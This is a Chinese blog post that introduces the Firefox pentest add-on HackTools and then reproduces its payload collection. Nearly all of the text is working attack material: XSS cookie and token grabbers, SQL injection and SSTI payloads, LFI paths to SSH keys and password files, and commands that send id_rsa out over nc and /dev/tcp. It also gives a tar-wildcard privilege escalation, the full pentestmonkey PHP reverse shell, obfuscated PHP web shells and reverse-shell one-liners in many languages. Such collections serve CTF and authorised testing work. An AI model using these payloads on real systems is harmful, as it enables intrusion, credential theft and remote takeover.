猫宁~~~

firefox插件hacktools地址:

https://addons.mozilla.org/zh-CN/firefox/addon/hacktools/

HackTools由Ludovic Coulon和Riadh BoUCHAHOUA创建。

这是他们插件制作的初衷:

我们是两个对计算机安全非常感兴趣的学生,这个想法是在我们的CTF培训期间出现的,我们注意到我们经常使用相同的工具(绘制一个shell,用php反向shell,Base64编码等等),这就是当我们想到将大多数工具和有效负载组合在一个地方的想法时,一个简单的Web应用程序就可以完成这项工作,但是来回移动相当令人沮丧,这就是为什么我们想直接在浏览器中实现一个扩展

由此,我们可以知道,一个渗透测试工具的目的,是提高生产力,有的时候,一种聚合也是一种创新。

1~xss相关payload

Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>

XSS in HTML/Applications

Basic Payload

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

Img tag payload

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

XSS in Markdown

[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

XSS in SVG (short)

<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;

2~sql注入payload

Generic SQL Injection Payloads

' or '
-- or #
' OR '1
' OR 1 -- - 
OR "" = "
" OR 1 = 1 -- -"
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2

Time-Based

,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Generic Error Based Payloads

OR 1=1
OR 1=1#
OR x=y#
OR 1=1--
OR x=x--
OR 3409=3409 AND ('pytW' LIKE 'pytW
HAVING 1=1
HAVING 1=1#
HAVING 1=0--
AND 1=1--
AND 1=1 AND '%'='
WHERE 1=1 AND 1=0--
%' AND 8310=8310 AND '%'='

Authentication Based Payloads

' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
or true--
" or true--
' or true--
") or true--
') or true--
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/

Order by and UNION Based Payloads

1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

3~Template Injections (SSTI),模板注入

Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

Jinja2 ( Flask / Django )

File reading

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

 
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

Write into a file

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}

 

4~LFI,本地文件包含

LFI stands for Local File Includes - it’s a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server.
Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

Directory traversal

foo.php?file=../../../../../../../etc/passwd

PHP Wrapper php://file

/example1.php?page=expect://ls

PHP Wrapper php://filter

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

Useful LFI files

Linux

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/[0-9]*/fd/[0-9]*
/proc/mounts
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db

Apache

/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log
Debian/Ubuntu -> /var/log/apache2/access.log
FreeBSD -> /var/log/httpd-access.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log

MySQL

/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

Windows

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txt
 
5~File Transfer,文件传递

Bash Upload

# Upload file over HTTP (require HTTP service running on the attacker machine)

bash -c 'echo -e "POST / HTTP/0.9 $(<id_rsa)" > /dev/tcp/10.10.164.167/1337'

# Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection

nc -l -p 1337 > data

bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'

Bash Download

# Send via netcat

nc -l -p 1337 < id_rsa

# Download file on the other machine

bash -c 'cat < /dev/tcp/10.10.164.167/1337 > id_rsa'

Netcat

# Upload payload

nc -lnvp 1337
nc 10.10.164.167 1337 < id_rsa

# Download

nc 10.10.164.167 1337 < id_rsa
nc -lnvp 1337 > file_saved

Python

# Python3 HTTP Server

python3 -m http.server 1337

# Python2 HTTP Server

python -m SimpleHTTPServer 1337

SCP

# Upload from local host to remote computer

scp id_rsa username@10.10.164.167:~/destination -P 1337

# Download from remote computer

scp user@10.10.164.167:~/path_to_file file_saved -P 1337

 
6~Useful Linux command for your Penetration Testing

SUID Commands

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -type f -name '*.txt' 2>/dev/null

What version of the system ?

cat /etc/issue
cat /etc/*-release 
cat /etc/lsb-release
cat /etc/redhat-release

What is its kernel version ?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

What is the environment variables ?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Service settings, there is any wrong allocation?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Is there any cron jobs ?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Other users host communication with the system ?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last

How to port forwarding ?

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpi...
backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc
localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

TAR wildcard cronjob privilege escalation

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
 
7~TTY Spawn Shell
 
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

Fully Interactive TTY

All the steps to stabilize your shell

# In the reverse shell
python -c 'import pty; pty.spawn("/bin/sh")'
ctrl+z
# Attacker Machine
stty raw -echo
fg
# In the reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows [num] columns [cols]

OS system spawn shell

echo os.system("/bin/bash")

Bash spawn shell

/bin/sh -i

Perl spawn shell

perl —e 'exec "/bin/sh";'

Python spawn shell

ruby: exec "/bin/sh"

Lua spawn shell

lua: os.execute("/bin/sh")

IRB spawn shell

exec "/bin/sh"

VI spawn shell

:!bash

VI(2) spawn shell

:set shell=/bin/bash:shell

Nmap spawn shell

!sh

 

8~PHP Reverse Shell

Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack.

Pentestmonkey's reverse shell

This script will make an outbound TCP connection to a hardcoded IP and port
  <?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // You have changed this
$port = ; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0; //
// Daemonise ourself if possible to avoid zombies later
// // pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork(); if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
} if ($pid) {
exit(0); // Parent exits
} // Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
} $daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
} // Change to a safe directory
chdir("/"); // Remove any umask we inherited
umask(0); //
// Do the reverse shell...
// // Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
} // Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
} // Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
} // Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
} // Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
} // If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
} // If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
} fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process); // Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
} ?>

Basic RCE

When you have successfully uploaded your payload, just put your commands after the variable ?cmd= (ex: ?cmd=ls -la")
<?php system($_GET["cmd"]);?

Obfuscate PHP Web Shell

<?=`$_GET[0]`?> 

Usage : http://target.com/path/to/shell.php?0=command

 

<?=`$_POST[0]`?>

Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"
 
<?=`{$_REQUEST['_']}`?>
Usage :
- http://target.com/path/to/shell.php?_=command
- curl -X POST http://target.com/path/to/shell.php -d "_=command" '
 
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
Usage :
- http://target.com/path/to/shell.php?0=command
 
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
Usage :
- http://target.com/path/to/shell.php?_=function&__=argument
- http://target.com/path/to/shell.php?_=system&__=ls

9~Reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.

bash -c 'exec bash -i &>/dev/tcp/192.168.100.100/100 <&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.100 100 >/tmp/f

php -r '$sock=fsockopen(getenv("192.168.100.100"),getenv("100"));exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="$ENV{192.168.100.100}";$p=$ENV{100};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("192.168.100.100"),int(os.getenv("100")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["192.168.100.100"],ENV["100"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TF=$(mktemp -u); mkfifo $TF && telnet 192.168.100.100 100 0<$TF | /bin/sh 1>$TF

over~~~

PJzhang:Firefox渗透测试插件HackTools样例的更多相关文章

  1. 34款Firefox渗透测试插件工具

    工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件,其中包含渗透测试.信息收集.代理.加密解密等功能. 1:Firebug Firefox的 ...

  2. 34款Firefox渗透测试插件

    1:Firebug Firefox的 五星级强力推荐插件之一,不许要多解释 2:User Agent Switcher 改变客户端的User Agent的一款插件 3:Hackbar 攻城师必备工具, ...

  3. Firefox渗透测试黑客插件集

    前天看S哥用Firefox的hackbar进行手动注入进行渗透,觉得直接运用浏览器的插件进行渗透测试有很多优点,既可以直接在前端进行注入等操作,也可以省却了寻找各种工具的麻烦.前端还是最直接的!于是这 ...

  4. C++的性能C#的产能?! - .Net Native 系列《三》:.NET Native部署测试方案及样例

    之前一文<c++的性能, c#的产能?!鱼和熊掌可以兼得,.NET NATIVE初窥> 获得很多朋友支持和鼓励,也更让我坚定做这项技术的推广者,希望能让更多的朋友了解这项技术,于是先从官方 ...

  5. PJzhang:漏洞渗透测试框架“天使之剑(AngelSword)”

    猫宁!!! 参考链接: www.phpinfo.cc/?post=42 https://www.freebuf.com/sectool/149883.html 同事介绍了一款渗透测试框架AngelSw ...

  6. docker搭建一个渗透测试环境 bwapp为例

    bwapp是一个渗透测试靶场,他其中中含有100多个Web漏洞  基本涵盖了所有主要的已知Web漏洞,包括OWASP Top 10的各种 首先要去搜索一下  看一下有哪些镜像可以下载    docke ...

  7. 18个扩展让你的Firefox成为渗透测试工具

    Firefox是一个出自Mozilla组织的流行的web浏览器.Firefox的流行并不仅仅是因为它是一个好的浏览器,而是因为它能够支持插件进而加强它自身的功能.Mozilla有一个插件站点,在那里面 ...

  8. Grunt经常使用插件及演示样例说明

    下述给出了经常使用Grunt插件,并列举了部分插件演示样例: 插件名称 说明 Github地址 grunt-contrib-clean 清空文件和目录 https://github.com/grunt ...

  9. firefox渗透师必备的利器

    工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件,其中包含渗透测试.信息收集.代理.加密解密等功能. 1:Firebug Firefox的 ...

随机推荐

  1. Android入门篇1-Hello World

    一.android studio安装. 二.项目结构 三.运行流程 src->main->AndroidMainifest.xml注册HelloWorldActivity(intent-f ...

  2. JAVA的包装类 【转】

    Java语言是一个面向对象的语言,但是Java中的基本数据类型却是不面向对象的,这在实际使用时存在很多的不便,为了解决这个不足,在设计类时为每个基本数据类型设计了一个对应的类进行代表,这样八个和基本数 ...

  3. 自定义tableViewCell

    http://my.oschina.net/joanfen/blog/137601 效果如下图:可触发按钮事件 1.创建一个Empty Application 2.新建一个TableViewContr ...

  4. vc判断文件是否存在

    #include <io.h> #include <stdio.h> #include <stdlib.h> void main( void ) { /* Chec ...

  5. 很不错的NGINX URL重写实例

    转自:http://www.jbxue.com/article/2187.html 本文介绍nginx URL重写的相关知识,包括301重定向的内容等,希望对大家有所帮助. nginx rewrite ...

  6. 【Lucene4.8教程之五】Luke

    一.Luke基本内容 1.Luke简介 Luke可用于查看Lucene创建的索引,并对其进行基本操作. 2.创建Luke (1)从Github上下载源文件 https://github.com/tar ...

  7. C#备份还原MySql数据库

    原文:C#备份还原MySql数据库 项目结束,粘点代码出来让Google或Baidu一下,原因是现在还搜不到这么现成的 调用MySql的工具mysqldump来实现. 类Cmd来实现调用cmd命令, ...

  8. kvm基本原理

    KVM源代码分析1:基本工作原理 下了很大决心挖这个坑,虽然之前对kvm有些了解,但纸上得来终觉浅,只有深入到代码层面,才能摈弃皮毛,看到血肉,看到真相.作为挖坑的奠基石,准备写上几篇:kvm基本工作 ...

  9. Python小代码_5_二维矩阵转置

    使用列表推导式实现二维矩阵转置 matrix = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]] print(matrix) matrix_t = [[ro ...

  10. 『NOIP2018普及组题解』

    标题统计 题目描述 凯凯刚写了一篇美妙的作文,请问这篇作文的标题中有多少个字符? 注意:标题中可能包含大.小写英文字母.数字字符.空格和换行符.统计标题字 符数时,空格和换行符不计算在内. 输入格式 ...